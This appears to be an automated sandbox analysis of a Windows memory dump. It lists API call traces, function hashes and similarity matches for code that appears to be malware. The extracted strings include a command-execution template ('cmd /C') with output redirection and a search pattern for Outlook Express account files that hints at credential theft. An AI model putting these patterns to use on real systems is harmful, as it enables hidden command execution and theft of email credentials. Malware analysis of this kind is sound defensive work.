  • Opcode ID: 00e719380342739fce2d9a83077352ae1e8e636be9c83fb6a114a482fd48beda
  • Instruction ID: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
  • Opcode Fuzzy Hash: 8CF059B0118943C9E83B20D21991BBEAB423F935CBC0E4631E40308A4F1E4762B63A98
  • Instruction Fuzzy Hash: dee2175d0ecb1ce5202f14c2b88485aae8b97b0dc343529db37c2c36949f19d9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C665D
  • memcpy.NTDLL(00000018,?,?), ref: 001C6686
  • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_00005549,00000000,000000FF,00000008), ref: 001C66C5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C66D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 34
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy
  • String ID:
  • API String ID: 1604688484-0
  • Opcode ID: 70e1818195bd2f9c5871c2ad9b4977da4bf534850ba99953615b9ffad3aae1f3
  • Instruction ID: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
  • Opcode Fuzzy Hash: E6D0A7BC444902D50C5B6427845C238C64A6EA03F4D0C0316EE66761EF7F4366F1EF56
  • Instruction Fuzzy Hash: bd90a6acd6f93b9920a860b7d0d98f2facffca05f66ada4364bbcdba502046b3
APIs
  • InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
  • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001D931B: wsprintfA.USER32 ref: 001D936D
  • lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001DB703: memset.NTDLL ref: 001DB75F
    • Part of subcall function 001DB703: memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
    • Part of subcall function 001DB703: RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
    • Part of subcall function 001DB703: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
    • Part of subcall function 001DB703: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
    • Part of subcall function 001DB703: CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
    • Part of subcall function 001DB703: GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
